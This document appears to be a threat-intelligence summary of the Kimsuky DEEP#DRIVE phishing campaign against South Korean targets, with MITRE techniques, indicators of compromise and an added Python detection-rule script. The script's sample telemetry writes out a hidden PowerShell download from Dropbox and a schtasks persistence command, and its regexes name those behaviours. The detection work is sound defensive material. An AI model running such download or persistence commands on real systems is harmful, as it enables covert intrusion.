Analyzing DEEP#DRIVE: North Korean Threat Actors Observed Exploiting Trusted Platforms for Targeted Attacks

The Securonix Threat Research team has identified a sophisticated malware campaign, DEEP#DRIVE, attributed to the North Korean group Kimsuky. Targeting South Korean businesses, government entities, and cryptocurrency users, the attackers utilize phishing lures crafted in Korean that masquerade as legitimate documents. The campaign employs various evasion techniques, including leveraging Dropbox for payload delivery and executing malicious PowerShell scripts to exfiltrate sensitive information. Affected: South Korean business sector, South Korean government sector, cryptocurrency users.

Key points:

  • Ongoing campaign attributed to Kimsuky targeting South Korea.
  • Involves multi-stage operations using tailored phishing lures in Korean.
  • Phishing documents masquerade as legitimate files like work logs and insurance documents.
  • Dropbox is used for hosting malicious payloads to evade detection.
  • PowerShell scripts are heavily utilized for payload delivery and reconnaissance.
  • Persistence mechanisms include creating scheduled tasks for recurring execution of malware.
  • Attackers employ code obfuscation techniques to avoid detection.
  • The campaign relies on the user’s action to download and execute malicious files.
  • Victimology indicates a focus on business, government, and cryptocurrency sectors in South Korea.

MITRE Techniques:

  • T1566.001: Phishing: Spearphishing Attachment – Utilized .lnk files disguised as legitimate documents.
  • T1071.001: Application Layer Protocol: Web Protocols – Leveraged Dropbox for command and control, and for exfiltration.
  • T1027: Obfuscated Files or Information – Employed obfuscation techniques to hide PowerShell scripts.
  • T1036: Masquerading – Used double file extensions to disguise malicious files.
  • T1059.001: Command and Scripting Interpreter: PowerShell – Executed PowerShell scripts for malicious activities.
  • T1102: Web Service – Exfiltrated data to Dropbox, treating it as a cloud service.
  • T1053.005: Scheduled Task/Job: Scheduled Task – Created a scheduled task for persistence.

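The tradecraft listed above (double-extension lures, PowerShell pulling payloads from Dropbox, scheduled-task persistence) can be turned into simple detection rules. The following is an added example, not code from Securonix or the original report; it assumes simplified endpoint telemetry events with `image`, `cmdline`, `parent` and `file` fields, and the sample events are constructed, with only the lure file name and the Dropbox host taken from the indicators on this page.

```python
"""Toy detection rules for the DEEP#DRIVE behaviours summarised above.

Added example (not from the Securonix report). Events are simplified
process/file telemetry dicts; the field names are an assumption.
"""
import re

# Rule 1: masquerading with a double extension, e.g. "notice.pdf.pdf" or "worklog.pdf.lnk"
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|hwp|txt)\.(pdf|lnk|exe|scr|bat|ps1)$", re.IGNORECASE)
# Rule 2: PowerShell fetching content from Dropbox's raw-content host
DROPBOX_FETCH = re.compile(r"dl\.dropboxusercontent\.com", re.IGNORECASE)
# Rule 3: schtasks /create launched by a script interpreter (persistence)
SCHTASKS_CREATE = re.compile(r"\bschtasks(\.exe)?\b.*\s/create\b", re.IGNORECASE)
SCRIPT_HOSTS = ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")

def classify(event):
    """Return the names of the rules that fire for one telemetry event."""
    hits = []
    image = event.get("image", "").lower()
    parent = event.get("parent", "").lower()
    cmdline = event.get("cmdline", "")
    if DOUBLE_EXT.search(event.get("file", "")):
        hits.append("double_extension")
    if image.endswith("powershell.exe") and DROPBOX_FETCH.search(cmdline):
        hits.append("powershell_dropbox_fetch")
    if SCHTASKS_CREATE.search(cmdline) and parent.endswith(SCRIPT_HOSTS):
        hits.append("scheduled_task_from_script")
    return hits

def scan(events):
    """Return (index, hits) for every event that triggers at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]

# Constructed sample telemetry: lure file name and Dropbox host mirror the IoC list; everything else is made up.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\explorer.exe", "parent": "", "cmdline": "", "file": "종신안내장V02_곽성환D.pdf.pdf"},
    {"image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://dl.dropboxusercontent.com/scl/fi/EXAMPLE/x.txt"', "file": ""},
    {"image": r"C:\Windows\System32\schtasks.exe", "parent": PS,
     "cmdline": "schtasks /create /sc minute /mo 30 /tn Updater /tr powershell.exe", "file": ""},
    {"image": r"C:\Windows\System32\schtasks.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "schtasks /query", "file": ""},
    {"image": r"C:\Program Files\Dropbox\Dropbox.exe", "parent": "", "cmdline": "Dropbox.exe sync", "file": "quarterly.docx"},
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(idx, hits)
```

The legitimate Dropbox client and a plain `schtasks /query` produce no hits, which is the point of tying each rule to the process context rather than to the Dropbox domain alone.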
Indicators of Compromise:

  • [URL] hxxps://dl.dropboxusercontent[.]com/scl/fi/slx06ol4jmjqn16icggin/.pptx
  • [URL] hxxps://dl.dropboxusercontent[.]com/scl/fi/sumch8o12a4ko7wqqtrgo/kxsxhx-f.txt
  • [URL] hxxps://dl.dropboxusercontent[.]com/scl/fi/gs58u6qvvxorzttv09yvt/kxsxhx-x.txt
  • [File Name] 종신안내장V02_곽성환D.pdf.pdf
  • [Hash – SHA256] 079907B7FEAB3673A1767DBFBC0626E656F5D3B03B6CFF471CC7CF8A1973AB34


Full Story: https://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/